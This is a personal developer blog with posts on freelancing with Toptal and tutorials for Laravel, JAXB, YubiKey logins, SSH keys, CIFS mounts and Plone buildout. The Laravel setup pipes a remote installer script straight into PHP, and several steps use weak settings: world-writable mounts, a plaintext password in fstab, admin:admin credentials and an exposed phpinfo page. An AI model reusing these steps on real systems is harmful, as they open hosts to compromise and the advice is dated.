Saturday, December 26, 2015

Ready for freelancing?

I’ve been a professional software/web developer for more than a decade. Until now I have mostly worked as a full-time employee in several companies, plus one contracting project as a freelancer, gaining expertise in many technologies along with Scrum Master management skills. The technologies I have used most recently were mostly web-development oriented.

After a decade of professional life I can say that a full-time corporate job is the right choice if you don't have much experience or have just got out of school. After gaining initial experience in corporate jobs, you will want to build a portfolio of the projects you have worked on. You will need that portfolio to show future clients that you are the right choice for them. Experience proves to both the client and yourself that you are capable of finishing projects.

After that you can try working on contract or as a freelancer, with flexible working hours, where only the end result counts. You need the self-discipline to work when needed, and to be reliable and responsible when communicating with clients. Being in control of your own availability also helps you make time to stay sharp and keep in step with the technology edge. All of this is just what I always wanted, so I decided it was time to dive into the freelance world.

In corporate culture, if you think only in terms of the financial side of software and its price, then of course you want to finish it as soon as possible to reduce its cost. Companies driven by that notion alone will often treat their developers as a necessary evil. For those companies the focus is not the product and the value it brings to the client, but the points of contracted work and their unreasonable deadlines.

Under management pressure to meet deadlines, developers often reduce product quality to gain speed. That is not a career plan you want to follow, because you don't have time to improve, and work is no fun in such stressful environments.

Then I searched the freelance market sites. I found sites like Upwork and Elance, which are great, but they don't guarantee constant work: first you need to build your reputation, and even then you have to compete with some very low, unreasonable offers.

If only there were some intermediary to connect self-organizing teams of professionals with the right customers, willing to pay for a good quality product along with reasonable deadlines (so we wouldn't need to compete with immoral offers for jobs like making a copy of a popular social network for $30, or less, in a couple of days). With the financial aspect covered, the team's job is to handle the time and quality aspects and get the job done. The team then develops the software incrementally and brings value to the customer, so that together they can steer the product in the right direction.

And then I heard of Toptal while attending a presentation on freelancing, scheduled at a gathering of the Banja Luka developer community. Ines Avdic Zekic from Sarajevo held an informative presentation about Toptal. Less than 3% of applicants pass the screening process, she said. Nobody likes to be tested, but if this is what I have to pass to put the financial aspect in the background, then by all means, let's do this.

Why join Toptal?

- If you pass the Toptal screening process, Toptal stands behind you. It takes care of finding jobs and paying you for completed work, even when a customer refuses to pay. With the worry of not being paid taken away, you can commit yourself fully to finishing the job.
- Yours is to get the job done; money should be just a side effect of your work.
- You can set a higher or lower hourly rate, and the frequency of jobs you receive will depend on it: the higher the rate, the lower the frequency.
- It enables you to connect with other freelance professionals and work together for Toptal's trusted customers and companies.
- You are not tied to a location, as long as you have a reliable internet connection.
- The market dictates new technologies, and that technology edge is exactly what you want to learn and contribute to. Toptal enables you to grow as an IT professional, providing courses and webinars on the technologies with the highest market demand.
- It enables you to grow your software using cutting-edge technologies and bring better value to its users. You don't want to end up in a company just maintaining some piece of software until time and new technologies overrun it.
- Availability and commitment can be changed: you can reduce your availability while travelling or on vacation, and increase it when you are eager to work.
- Working 9 to 5 is not necessarily what brings the most out of a developer. I want to use the morning hours for work because I'm well rested; after lunch I can take a nap, do some physical activity, and then return to finish the work refreshed and sharp-minded.

In Banja Luka there are still no developers working for Toptal. This is a great opportunity to make the first step and connect Toptal with talented developers from this region and the Banja Luka developer community. What I've heard so far has convinced me that Toptal is the right fit for me. I'm eager to learn new technologies, to improve myself through active communication with Toptal clients, and to deliver them good, useful software. Later on, my ambition is to gather people around me so we can provide Toptal services across a wide range of technologies as a self-organized team.

Now I'm heading back to Codility for some more practice. Toptal also provides a guide for interviewing PHP developers.

Wish me luck!

Tuesday, July 14, 2015

Simple blog using Laravel - Part I

Migrations

Create the articles migration:
$ php artisan make:migration create_articles_table --create="articles"
Inside database/migrations find the created migration:
2015_07_13_192755_create_articles_table.php
and add these lines to the up() method:
Schema::create('articles', function (Blueprint $table) {
    $table->increments('id');
    $table->string('title');
    $table->text('body');
    $table->text('excerpt')->nullable();
    $table->timestamp('published_at');
    $table->timestamps();
});
To execute the created migration run:
$ php artisan migrate
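If you need to undo it, roll back the last batch of migrations with:
$ php artisan migrate:rollback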

Routes

Edit
app\Http\routes.php
and add this line:
Route::resource('articles', 'ArticlesController');
This is the easier way, equivalent to manually supplying all the CRUD routes following the REST convention, like so:
Route::get('articles', 'ArticlesController@index');
Route::get('articles/create', 'ArticlesController@create');
Route::get('articles/{id}', 'ArticlesController@show');
Route::post('articles', 'ArticlesController@store');
Route::get('articles/{id}/edit', 'ArticlesController@edit');
Route::put('articles/{id}', 'ArticlesController@update');
Route::delete('articles/{id}', 'ArticlesController@destroy');
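To verify the generated routes you can list them with artisan:
$ php artisan route:list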

Model

We have an articles table, so let's create the Article model:
$ php artisan make:model Article
Edit our model app\Article.php and add the $fillable fields so we can mass assign them when creating an article. Also add the published_at field to $dates so Laravel treats it as a Carbon date object instead of a plain string.
class Article extends Model
{
    protected $dates = ['published_at'];

    protected $fillable = [
        'title',
        'body',
        'published_at',
    ];
}
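Because published_at is listed in $dates, Eloquent hands it back as a Carbon instance, so date helpers work on it directly. A quick illustrative check in tinker (once an article exists; see the examples below):
$article = App\Article::first();
$article->published_at->diffForHumans(); // e.g. "2 hours ago"
$article->published_at->format('Y-m-d'); // formatted string instead of raw text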

Add two rows to the articles table using Laravel's interactive tinker tool (lines after the first are typed at the tinker prompt):
$ php artisan tinker
App\Article::create(['title' => 'My first article', 'body' => 'Article body', 'published_at' => Carbon\Carbon::now()]);
App\Article::create(['title' => 'New article', 'body' => 'New body', 'published_at' => Carbon\Carbon::now()]);
App\Article::all();
Update the first article:
$article = App\Article::find(1);
$article->body = 'Lorem ipsum';
$article->save();
App\Article::all();
Get a collection of articles:
$articles = App\Article::where('body','Lorem ipsum')->get();
Get the first matching article:
$article = App\Article::where('body','Lorem ipsum')->first();

Controller

Let's create a plain ArticlesController:
$ php artisan make:controller ArticlesController --plain
Now we will create the index action to fetch the list of articles.
Edit app\Http\Controllers\ArticlesController.php:
public function index()
{
    $articles = Article::latest('published_at')->published()->get();
    return view('articles.index', compact('articles'));
}
We use the published() scope when fetching articles to get only those whose published_at is in the past, and latest('published_at') to sort them from newest to oldest. So let's create the published() scope in the app\Article.php model. The naming convention is the keyword scope followed by the scope name, like this:
use Carbon\Carbon;
public function scopePublished($query)
{
    $query->where('published_at', '<=', Carbon::now());
}
To show the details of a selected article we need the show() action. Edit app\Http\Controllers\ArticlesController.php:
public function show($id)
{
    $article = Article::findOrFail($id);
    return view('articles.show', compact('article'));
}

View

Inside resources\views create app.blade.php:
<!doctype html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>Document</title>
<link rel="stylesheet" href="//maxcdn.bootstrapcdn.com/bootstrap/3.2.0/css/bootstrap.min.css">
</head>
<body>
<div class="container">
@yield('content')
</div>
@yield('footer')
</body>
</html>
Inside resources\views\articles create index.blade.php:
@extends('app')
@section('content')
<div class="col-md-12 staff-header">
<h5>Articles</h5>
</div>
<div class="col-xs-12 col-md-12">
@foreach( $articles as $article)
<article>
<h4>
<a href="{{ action('ArticlesController@show', [$article->id]) }}">{{ $article->title }}</a>
</h4>
<h6>{{ $article->body }}</h6>
<br/>
</article>
@endforeach
</div>
@stop
Inside resources\views\articles create show.blade.php:
@extends('app')
@section('content')
<div class="col-md-12 staff-header">
<h5>{{ $article->title }}</h5>
</div>
<div class="col-xs-12 col-md-12">
<article>
<h6>{{ $article->body }}</h6>
</article>
</div>
@stop

Tuesday, June 30, 2015

Laravel on Debian Wheezy

LAMP

First we need the LAMP packages installed.
Laravel requires PHP >= 5.5.9, so we will install PHP 5.6 from the dotdeb repository.

Add package repositories to apt sources.
Edit sources.list
$ vi /etc/apt/sources.list
and add these two lines:
deb http://packages.dotdeb.org wheezy-php56 all
deb-src http://packages.dotdeb.org wheezy-php56 all

Add the dotdeb.gpg key so apt can authenticate packages from the added sources.
$ cd
$ wget http://www.dotdeb.org/dotdeb.gpg
$ apt-key add dotdeb.gpg
$ apt-get update

Install Apache, MySQL and PHP
$ apt-get install mysql-server mysql-client
$ apt-get install apache2
$ apt-get install php5 libapache2-mod-php5 php5-mcrypt

Enable the Apache rewrite module
$ a2enmod rewrite
$ /etc/init.d/apache2 restart

Confirm that PHP is working with Apache by creating an info.php file:
$ vi /var/www/info.php
add this line:
<?php phpinfo(); ?>
Access it in the browser: http://localhost/info.php

Laravel

# To install Laravel we need composer:
$ sudo curl -sS https://getcomposer.org/installer | php -- --install-dir=/usr/local/bin --filename=composer

* Use composer to install the laravel installer:
$ composer global require "laravel/installer=~1.1"

* Add the composer bin directory to your PATH so you can use the laravel executable from any location. Edit the .bash_profile file:
$ vi ~/.bash_profile
and add these lines:
PATH=$PATH:~/.composer/vendor/bin
export PATH

* Create a new base for the web application
$ cd ~/NetBeansProjects
$ laravel new LaravelDemo

# Alternatively, we could skip installing the laravel installer and using its executable to create the application base (the steps marked with an asterisk *), and do all of that directly with composer:
$ rm -rf ~/NetBeansProjects/LaravelDemo
$ cd ~/NetBeansProjects
$ composer create-project laravel/laravel LaravelDemo --prefer-dist

# Create an Apache VirtualHost:
$ vi /etc/apache2/sites-available/laraveldemo.org
and add these lines:
<VirtualHost *:80>
    ServerAdmin webmaster@laraveldemo.org
    ServerName  laraveldemo.org
    ServerAlias *.laraveldemo.org

    DocumentRoot /home/{user}/NetBeansProjects/LaravelDemo/public
    <Directory /home/{user}/NetBeansProjects/LaravelDemo/public>
        Options Indexes FollowSymLinks MultiViews
        AllowOverride All
        Order allow,deny
        allow from all
    </Directory>

    ErrorLog ${APACHE_LOG_DIR}/laraveldemo_error.log

    # Possible values include: debug, info, notice, warn, error, crit,
    # alert, emerg.
    LogLevel warn

    CustomLog ${APACHE_LOG_DIR}/laraveldemo_access.log combined
</VirtualHost>

# Enable virtual host:
$ a2ensite laraveldemo.org

# Add virtual host to hosts file by editing:
$ vi /etc/hosts
add this line:
127.0.0.1 laraveldemo.org

# Restart apache
$ service apache2 restart

# Create a simple /about route and the appropriate controller, action and view
$ cd ~/NetBeansProjects/LaravelDemo
$ vi app/Http/routes.php 
add this line to routes.php:
Route::get('about', 'PagesController@about');

# Create PagesController by:
$ php artisan make:controller PagesController --plain
$ vi app/Http/Controllers/PagesController.php
 
add the about() method to PagesController.php:
public function about() {
    return view('about');
}

# Create the about view by editing about.blade.php:
$ vi resources/views/about.blade.php
add this line:
    Hello World

# Make local configuration
$ cp .env.example .env

# Generate app key
$ php artisan key:generate

# Set Directory Permissions
$ cd ~/NetBeansProjects/LaravelDemo
$ chgrp www-data -Rv storage/
$ chmod g+w -Rv storage/
$ cd bootstrap/
$ chgrp www-data -Rv cache
$ chmod g+w -Rv cache

Test it by pointing your browser to:
http://laraveldemo.org/about

Create database
mysql> create database laraveldemo;
mysql> CREATE USER 'laraveldemouser'@'localhost' IDENTIFIED BY 'laraveldemopass';
mysql> GRANT ALL ON laraveldemo.* TO 'laraveldemouser'@'localhost';

# Add mysql authentication data to .env
$ vi .env
change these lines:
DB_HOST=localhost
DB_DATABASE=laraveldemo
DB_USERNAME=laraveldemouser
DB_PASSWORD=laraveldemopass
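A quick way to confirm these settings is to run the migrations; artisan will report a connection error if Laravel cannot reach the database:
$ php artisan migrate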

Monday, August 9, 2010

How to load/write XML using JAXB?

Every now and then you need to load or write XML files. XML is a very effective way to put data into machine-readable form: a text format, well structured according to standardized rules.

So to demonstrate the use of JAXB we will:
1) create XML file with some data (bookmarks.xml)
2) create XML schema file to validate our XML file (bookmarks.xsd)
3) create XML object model using xjc utility (xjc.txt)
4) load that XML file into JAXB object (XMLUnmarshall.java)
5) write JAXB object back over original XML file (XMLMarshaller.java)
6) create a main java class to call these functions in the appropriate order (JAXBLoader.java)

Create XML file
Let's create a simple XML file for storing bookmark data organized into sets. It will contain a root element bookmarks with bookmark elements inside, and a list of attribute elements for storing href values. Also, every bookmark element will have a set attribute identifying the current bookmark set. An example of this XML can be found here: bookmarks.xml.
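For illustration, a document with that structure might look like the following minimal sketch (the element and attribute names are assumptions reconstructed from the description above and the xjc output below):

<?xml version="1.0" encoding="UTF-8"?>
<!-- illustrative bookmarks.xml sketch -->
<bookmarks>
    <bookmark set="development">
        <attribute href="http://ant.apache.org/"/>
        <attribute href="http://www.eclipse.org/"/>
    </bookmark>
    <bookmark set="news">
        <attribute href="http://slashdot.org/"/>
    </bookmark>
</bookmarks>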

Create XML schema file
To validate bookmarks.xml we need to create a schema file. An example can be found here: bookmarks.xsd.
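A minimal schema sketch for that structure could look like this (again, names are assumptions matching the XML sketch above; the original bookmarks.xsd evidently declared a named attributeType, judging by the AttributeType class that xjc generates below):

<?xml version="1.0" encoding="UTF-8"?>
<!-- illustrative bookmarks.xsd sketch -->
<xs:schema xmlns:xs="http://www.w3.org/2001/XMLSchema">
    <xs:complexType name="attributeType">
        <xs:attribute name="href" type="xs:anyURI"/>
    </xs:complexType>
    <xs:element name="bookmarks">
        <xs:complexType>
            <xs:sequence>
                <xs:element name="bookmark" maxOccurs="unbounded">
                    <xs:complexType>
                        <xs:sequence>
                            <xs:element name="attribute" type="attributeType" maxOccurs="unbounded"/>
                        </xs:sequence>
                        <xs:attribute name="set" type="xs:string"/>
                    </xs:complexType>
                </xs:element>
            </xs:sequence>
        </xs:complexType>
    </xs:element>
</xs:schema>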

Create object model
To create the object model for our XML, run the xjc utility and supply it with the XSD schema file as a command-line argument:

zlaja@orion:~/NetBeansProjects/JAXBLoader> xjc ./data/bookmarks.xsd -p com.blogspot.zetaorionis.bookmarks.model -d ./src
parsing a schema...
compiling a schema...
com/blogspot/zetaorionis/bookmarks/model/AttributeType.java
com/blogspot/zetaorionis/bookmarks/model/Bookmark.java
com/blogspot/zetaorionis/bookmarks/model/Bookmarks.java
com/blogspot/zetaorionis/bookmarks/model/ObjectFactory.java
com/blogspot/zetaorionis/bookmarks/model/package-info.java
zlaja@orion:~/NetBeansProjects/JAXBLoader>

Unmarshalling / loading XML data into an object model instance
This utility class will help you read an XML file into its object representation. It will work with any XML file; you just need to supply it with the URI path to the XML file:
data/bookmarks.xml

and the root element class of the object model:
Bookmarks.class

Here is XMLUnmarshaller.java utility class:

package com.blogspot.zetaorionis.util.xml;

import java.io.FileNotFoundException;
import java.io.InputStream;
import java.io.IOException;
import java.net.URI;

import javax.xml.bind.JAXBContext;
import javax.xml.bind.JAXBElement;
import javax.xml.bind.JAXBException;
import javax.xml.bind.Unmarshaller;
import javax.xml.transform.stream.StreamSource;

import org.apache.log4j.Logger;

/**
*
* @author zlaja
*/
public class XMLUnmarshaller {

    private static final Logger logger = Logger.getLogger(XMLUnmarshaller.class);

    /**
     * The XML file to load.
     */
    protected URI uri;

    /**
     * Create an XML based loader.
     * @param uri the XML file
     */
    public XMLUnmarshaller(final URI uri) {
        this.uri = uri;
    }

    /**
     * Load the XML file into an instance of the object model.
     *
     * @throws IOException if an I/O error occurred.
     * @throws FileNotFoundException if the resource was not found.
     */
    public <T> T load(Class<T> docClass) throws IOException {
        final InputStream in = getClass().getResourceAsStream("/" + uri.getPath());

        if (in == null) {
            throw new FileNotFoundException("Cannot find resource: " + uri);
        }

        try {
            return load(docClass, in);
        } finally {
            in.close();
        }
    }

    protected <T> T load(Class<T> docClass, final InputStream in) {
        T o = null;
        try {
            o = unmarshal(docClass, in);
        } catch (JAXBException ex) {
            logger.error("Error while unmarshalling.", ex);
        }
        return o;
    }

    public <T> T unmarshal(Class<T> docClass, InputStream inputStream)
            throws JAXBException {
        // The JAXBContext is created from the package of the xjc-generated classes.
        String packageName = docClass.getPackage().getName();
        JAXBContext jc = JAXBContext.newInstance(packageName);
        Unmarshaller u = jc.createUnmarshaller();
        JAXBElement<T> doc = u.unmarshal(new StreamSource(inputStream), docClass);
        return doc.getValue();
    }
}

Marshalling / writing data from an object model instance to XML
This utility class will help you write data from the object representation to an XML file. It will work with any XML file; you just need to supply it with the URI path to the XML file:
data/bookmarks.xml

and the root element class of the object model:
Bookmarks.class

Here is XMLMarshaller.java utility class:
package com.blogspot.zetaorionis.util.xml;

import java.io.FileNotFoundException;
import java.io.OutputStream;
import java.io.FileOutputStream;
import java.net.URI;
import java.io.IOException;

import javax.xml.bind.JAXBContext;
import javax.xml.bind.JAXBElement;
import javax.xml.bind.JAXBException;
import javax.xml.bind.Marshaller;

import org.apache.log4j.Logger;

/**
*
* @author zlaja
*/
public class XMLMarshaller {

    private static final Logger logger = Logger.getLogger(XMLMarshaller.class);

    /**
     * The output XML file.
     */
    protected URI uri;

    /**
     * Create an XML based writer for the specified JAXB object.
     * @param uri - URI of the output XML file
     */
    public XMLMarshaller(final URI uri) {
        this.uri = uri;
    }

    /**
     * Write the JAXBElement representation of an object to the XML file.
     *
     * @param jaxbObject - object to marshal to XML, wrapped in a JAXBElement.
     * The wrapping is done using a factory method from ObjectFactory.java,
     * which is generated by the xjc utility.
     * @param docClass - class of the object that is going to be marshalled
     *
     * @throws IOException if an I/O error occurred.
     * @throws FileNotFoundException if the file cannot be created (thrown
     * by the FileOutputStream constructor).
     */
    public void write(final JAXBElement<?> jaxbObject, Class<?> docClass) throws IOException {
        final OutputStream os = new FileOutputStream(uri.getPath());

        try {
            write(jaxbObject, docClass, os);
        } finally {
            os.close();
        }
    }

    protected void write(final JAXBElement<?> jaxbObject, Class<?> docClass, final OutputStream os) {
        try {
            marshall(jaxbObject, docClass, os);
        } catch (JAXBException ex) {
            logger.error("Error in marshalling to XML.", ex);
        }
    }

    private void marshall(final JAXBElement<?> jaxbObject, Class<?> docClass, final OutputStream os)
            throws JAXBException {
        // The JAXBContext is created from the package of the xjc-generated classes.
        String packageName = docClass.getPackage().getName();
        JAXBContext context = JAXBContext.newInstance(packageName);
        Marshaller m = context.createMarshaller();
        m.setProperty(Marshaller.JAXB_FORMATTED_OUTPUT, Boolean.TRUE);
        m.marshal(jaxbObject, os);
    }
}

Call utility classes inside main class
package com.blogspot.zetaorionis.jaxbloader;

import com.blogspot.zetaorionis.bookmarks.model.Bookmarks;
import com.blogspot.zetaorionis.bookmarks.model.ObjectFactory;
import com.blogspot.zetaorionis.util.xml.XMLMarshaller;
import com.blogspot.zetaorionis.util.xml.XMLUnmarshaller;
import java.net.URI;
import org.apache.log4j.Logger;
import org.apache.log4j.PropertyConfigurator;

/**
*
* @author zlaja
*/
public class JAXBLoader {

    private static final String LOG4J_PROPERTIES = "data/log4j.properties";
    private static final Logger logger = Logger.getLogger(JAXBLoader.class);
    private Bookmarks bookmarks = new Bookmarks();

    public JAXBLoader() {
        // Configure log4j from the properties file.
        PropertyConfigurator.configure(LOG4J_PROPERTIES);
    }

    /**
     * Loads XML data into the object model.
     */
    private void loadBookmarks() {
        try {
            final String path = "data/bookmarks.xml";
            final URI uri = new URI(path);

            final XMLUnmarshaller xmlBookmarks = new XMLUnmarshaller(uri);
            this.bookmarks = xmlBookmarks.load(Bookmarks.class);
            logger.info("Info: Bookmarks loaded successfully.");
        } catch (Exception ex) {
            logger.error("Error: Loading bookmarks XML file failed", ex);
        }
    }

    /**
     * Writes the object model back to XML.
     */
    private void writeBookmarks() {
        try {
            final String path = "data/bookmarks.xml";
            final URI uri = new URI(path);

            final XMLMarshaller xmlBookmarks = new XMLMarshaller(uri);
            ObjectFactory of = new ObjectFactory();
            xmlBookmarks.write(of.createBookmarks(this.bookmarks), Bookmarks.class);
            logger.info("Info: Bookmarks written successfully.");
        } catch (Exception ex) {
            logger.error("Error: Writing bookmarks XML file failed", ex);
        }
    }

    /**
     * @param args the command line arguments
     */
    public static void main(String[] args) {
        JAXBLoader loader = new JAXBLoader();
        loader.loadBookmarks();
        loader.writeBookmarks();
    }
}

Saturday, February 20, 2010

Use yubikey for safer and less painful browsing

What is yubikey?
A yubikey is a USB-powered piece of hardware with a single action button that generates OTPs (one-time passwords).

Main advantages:
- There is no need to remember credentials for different sites on the web. Just plug in the yubikey and press the action button, which creates a random OTP prefixed with the unique ID of that particular yubikey.
- It guarantees the user's identity and thus prevents phishing attacks and interception of credentials.

Main disadvantages:
- You have to carry it with you :), but you can still access your web portals without it the old-fashioned way, by typing your credentials.

Setting things up:
You need to register your account at KeyGenius:
http://kg.yubico.com/

You can use a Basic or Standard account type. Basic will not ask you for any password when logging in; all you need is one touch on your yubikey for every login on the web. You are relieved of typing. A Standard account is more secure: on first access it will ask for your KeyGenius credentials, and after supplying them you can use the yubikey as with a Basic account for every other portal on the web.

Under your account you need to supply the username, password and domain for every site whose credentials you want it to manage.

So it works like this: say you want to log in to facebook.com. You open Facebook in the browser, which remembers your username. Instead of typing the password, you plug in your yubikey and touch the button. The login process then continues automatically: a request is first sent to KeyGenius to return the real password for Facebook, and after receiving it the browser logs you in.

The browser needs to know how to get the password from KeyGenius. That is accomplished with a JavaScript userscript, which can be installed into the browser using the Greasemonkey addon. The script can be found here:
http://kg.yubico.com/keygenius.user.js

And that's it. Enjoy your safe browsing... :)

Database synchronization using TableSyncer

Prerequisites:
ruby
ruby-devel
ruby-mysql
rubygems
libmysqlclient
libmysqlclient-devel
libopenssl-devel
zlib-devel

Installation:
sudo gem install mysql
sudo gem install table_syncer

Settings:
cd /usr/lib64/ruby/gems/1.8/gems/table_syncer-0.3.1/lib
cp table_syncer.rb table_syncer.rb.orig
vi table_syncer.rb

Add and change these lines:
local_source_db = {:host => '127.0.0.1', :user => 'user', :password => 'password', :db => 'SourceDatabase'}
local_test_db = {:host => '127.0.0.1', :user => 'user', :password => 'password', :db => 'test'}

Executing:
table_syncer --from=local_source_db --to=local_test_db --tables=account

Reference:
http://code.google.com/p/ruby-roger-useful-functions/wiki/TableSyncer
http://www.freelinuxtutorials.com/quick-tips-and-tricks/sync-mysql-tables-via-ruby-gem-tablesyncer/
http://forums.mysql.com/read.php?116,178217,198518#msg-198518

SCP & SSH

At local machine:
ssh-keygen -t rsa
cd ~/.ssh
cp id_rsa.pub authorized_keys
scp -p ~/.ssh/authorized_keys username@remoteMachine:.ssh/

Note that before executing scp you need to make sure that ~/.ssh also exists on the remote machine; create it if necessary with
mkdir ~/.ssh

At remote machine:
cd
ls -ld . .ssh .ssh/authorized_keys
drwxr-xr-x 36 username username 4096 Jul 25 02:24 .
drwxr-xr-x 2 username username 512 Apr 10 02:30 .ssh
-rw-r--r-- 1 username username 1674 Apr 10 02:29 .ssh/authorized_keys

cd
chmod go-w . .ssh .ssh/authorized_keys

At local machine:
scp -p file username@remoteMachine:path/to/file

Reference:
http://kimmo.suominen.com/docs/ssh/

Mounting remote windows station

1) Using mount command:
mount -t cifs //192.168.0.4/Movies ~/Desktop/movies/

2) Using /etc/fstab file:
//192.168.0.4/Movies /media/remote/movies cifs file_mode=0777,dir_mode=0777,password=******** 0 0
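Keeping the password directly in /etc/fstab makes it world-readable; mount.cifs also accepts a credentials file (the path here is just an example):
//192.168.0.4/Movies /media/remote/movies cifs credentials=/root/.smbcredentials,file_mode=0777,dir_mode=0777 0 0
where /root/.smbcredentials contains two lines: username=... and password=...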

Mounting iso file image:
mkdir /media/iso
mount -o loop -t iso9660 ~/file.iso /media/iso

Monday, March 30, 2009

Installing Plone True Gallery

Problem
It should be as simple as editing buildout.cfg and running buildout again.
Edit buildout.cfg with:
$ joe buildout.cfg

Under the eggs and zcml sections add the collective.plonetruegallery string, like:
eggs =
collective.plonetruegallery
...
zcml =
collective.plonetruegallery

Run buildout again with:
$ ./bin/buildout -v

This will give you the error:
Error: Couldn't find a distribution for 'gdata.py>=1.2.3'.

The problem is that the gdata.py package no longer exists, because it is now known simply as gdata.

Solution
$ wget http://pypi.python.org/packages/source/c/collective.plonetruegallery/collective.plonetruegallery-0.6b2.4.tar.gz
$ tar xfz collective.plonetruegallery-0.6b2.4.tar.gz
$ cd collective.plonetruegallery-0.6b2.4
$ joe setup.py
Change gdata.py to gdata in the dependency section so it looks like this:
install_requires=[
'setuptools',
'gdata>=1.2.3',
'flickrapi>=1.2',
'simplejson',
'elementtree'
],
$ sudo python2.4 setup.py install
$ joe buildout.cfg

Add zcml slug like:
zcml =
collective.plonetruegallery

Run buildout again with:
$ ./bin/buildout -v

Run your instance with:
$ ./bin/instance fg

Now it should appear under 'add on products', so you can install it.

Sunday, March 29, 2009

Managing projects using buildout

Directories in the buildout
Before we dive into buildout.cfg, let us take a quick look at the directories that buildout has created for us:
bin/

Contains various executables, including the buildout command, and the instance Zope control script.
eggs/

Contains eggs that buildout has downloaded. These will be explicitly activated by the control scripts in the bin/ directory.
downloads/

Contains non-egg downloads, such as the Zope source code archive.
var/

Contains the log files (in var/log/) and the file storage ZODB data (in var/filestorage/Data.fs). Buildout will never overwrite these.
src/

Initially empty. You can place your own development eggs here and reference them in buildout.cfg. More on that later.
products/

This is analogous to a Zope instance's Products/ directory (note the difference in capitalisation). If you are developing any old-style Zope 2 products, place them here. We will see how buildout can automatically download and manage archives of products, but if you want to extract a product dependency manually, or check one out from Subversion, this is the place to do so.
parts/

Contains code and data managed by buildout. In our case, it will include the local Zope installation, a buildout-managed Zope instance, and Plone's source code. In general, you should not modify anything in this directory, as buildout may overwrite your changes.

The main [buildout] section
The [buildout] section is the starting point for the file. It lists a number of "parts", which are configured in separate sections later in the file. Each part has an associated recipe, which is the name of an egg that knows how to perform a particular task, e.g. build Zope or create a Zope instance. A recipe typically takes a few configuration options.

Our global settings are as follows:
[buildout]
parts =
plone
zope2
productdistros
instance
zopepy
find-links =
http://dist.plone.org
http://download.zope.org/ppix/
http://download.zope.org/distribution/
http://effbot.org/downloads
eggs =
elementtree
develop =

This specifies that the parts plone, zope2, productdistros, instance and zopepy will be run, in that order. Then we tell buildout that it can search a number of URLs when it is looking for eggs to download. In addition, it will always search the Cheese Shop.

Next, we can list any eggs that buildout should download and install for us. This may include version specifications. For example, if you want sqlalchemy 0.3, but not 0.4, you could list:
eggs =
elementtree
sqlalchemy>=0.3,<0.4dev

Finally, we can list development eggs, by specifying a directory where the egg is extracted in source format. For example:
eggs =
elementtree
my.package
develop =
src/my.package

This presumes that there is an egg called my.package in the src/ directory. We will learn how to create such eggs a little later in this tutorial. Notice how we must also list my.package as an actual egg dependency: development eggs are not automatically added to the "working set" of eggs that are installed for Zope.

The [plone] section
This is very simple - it just uses plone.recipe.plone to download Plone's products and eggs.
[plone]
recipe = plone.recipe.plone

It will use the latest release available. Version numbers for plone.recipe.plone correspond to version numbers for Plone itself. Therefore, to make sure you always get a 3.0.x release, but not a 3.1, you can do:
[plone]
recipe = plone.recipe.plone>=3.0,<3.1dev

When the recipe is run, Plone's products will be installed in parts/plone. The eggs are made available via buildout variable ${plone:eggs}, which we will reference in the [instance] section later, and the URL of a "known good" version of Zope is available in the variable ${plone:zope2-url}.

The [zope2] section
This part builds Zope 2, using plone.recipe.zope2install. If you specified an existing Zope installation, you will not have this part. Otherwise, it looks like this:
[zope2]
recipe = plone.recipe.zope2install
url = ${plone:zope2-url}

Here, we reference the download location for Zope as emitted by the [plone] part. This ensures that we always get the recommended version of Zope. You could specify a download URL manually instead, if you wanted to use a different version of Zope.

When the recipe is run, Zope 2 is installed in parts/zope2. The Zope software home becomes parts/zope2/lib/python.

The [productdistros] section
This uses the plone.recipe.distros recipe, which is able to download distributions (archives) of Zope 2 style products and make them available to Zope. It is empty to begin with:
[productdistros]
recipe = plone.recipe.distros
urls =
nested-packages =
version-suffix-packages =

However, you can list any number of downloads. The recipe is also able to deal with archives that contain a single top-level directory that contains a bundle of actual product directories (nested-packages), or packages that have a version number in the directory name and thus need to be renamed to get the actual product directory (version-suffix-packages).

Consider the following distributions:

# A typical distribution

ExampleProduct-1.0.tgz
|
|- ExampleProduct
| |
| |- __init__.py
| |- (product code)

# A version suffix distribution

AnotherExampleProduct-2.0.tgz
|
|- AnotherExampleProduct-2.0
| |
| |- __init__.py
| |- (product code)

# A nested package distribution

ExampleProductBundle-1.0.tgz
|
|- ExampleProductBundle
| |
| |- ProductOne
| | |- __init__.py
| | |- (product code)
| |
| |- ProductTwo
| | |- __init__.py
| | |- (product code)

Here is what the part would look like if we try to install the three distributions above:
[productdistros]
recipe = plone.recipe.distros
urls =
http://example.com/dist/ExampleProduct-1.0.tgz
http://example.com/dist/AnotherExampleProduct-2.0.tgz
http://example.com/dist/ExampleProductBundle-1.0.tgz
nested-packages = ExampleProductBundle-1.0.tgz
version-suffix-packages = AnotherExampleProduct-2.0.tgz

You can specify multiple downloads on separate lines. When the recipe is run, the product directories for downloaded products are found in parts/productdistros.

The [instance] section
The instance section pulls it all together: It configures a Zope instance using the plone.recipe.zope2instance script. Here is how it looks:
[instance]
recipe = plone.recipe.zope2instance
zope2-location = ${zope2:location}
user = admin:admin
http-address = 8080
debug-mode = on
verbose-security = on
eggs =
${buildout:eggs}
${plone:eggs}
zcml =
products =
${buildout:directory}/products
${productdistros:location}
${plone:products}

Here, we reference the Zope 2 installation from the [zope2] part - if you specified a location yourself when creating the buildout, you would see that one here. Then, we specify the initial admin user and password, and the port that Zope will be bound to. We also turn on debug mode and verbose security. These options are used to generate an appropriate zope.conf file for this instance. See the recipe page in the Cheese Shop for more details on the options available.

Next, we specify which eggs will be made available to Zope. This references the "global" eggs from the [buildout] section, as well as the eggs specified by Plone. You could add additional eggs here, though it is generally easier to specify these at the top of the file, so that they get included in the ${buildout:eggs} working set.

As explained previously, Zope 3 configure.zcml files are not loaded automatically for eggs or packages not in the Products namespace. To load ZCML files for a regular package, we can make buildout create a ZCML slug by listing the package under the zcml option:
zcml =
my.package
my.package-overrides

This assumes that my.package was previously referenced in the buildout. This would load both the main configure.zcml and the overrides.zcml file from this package.

Finally, we list the various directories that contain Zope 2 style products - akin to the Products/ directory in a traditional instance. Notice how the products/ directory in the main buildout directory comes first, followed by the products downloaded with the [productdistros] part, followed by the products downloaded by the [plone] part. This means that even if Plone ships with a product, you could override it (e.g. with a newer product) by putting a product with the same name in the top-level products/ directory.

When the recipe is run, the Zope instance home will be parts/instance, and a control script is created in ./bin/instance.

The [zopepy] section
This final section creates a Python interpreter that has all the eggs and packages (but not Zope 2 style products) that Zope would have during startup. This can be useful for testing purposes.
[zopepy]
recipe = zc.recipe.egg
eggs = ${instance:eggs}
interpreter = zopepy
extra-paths = ${zope2:location}/lib/python
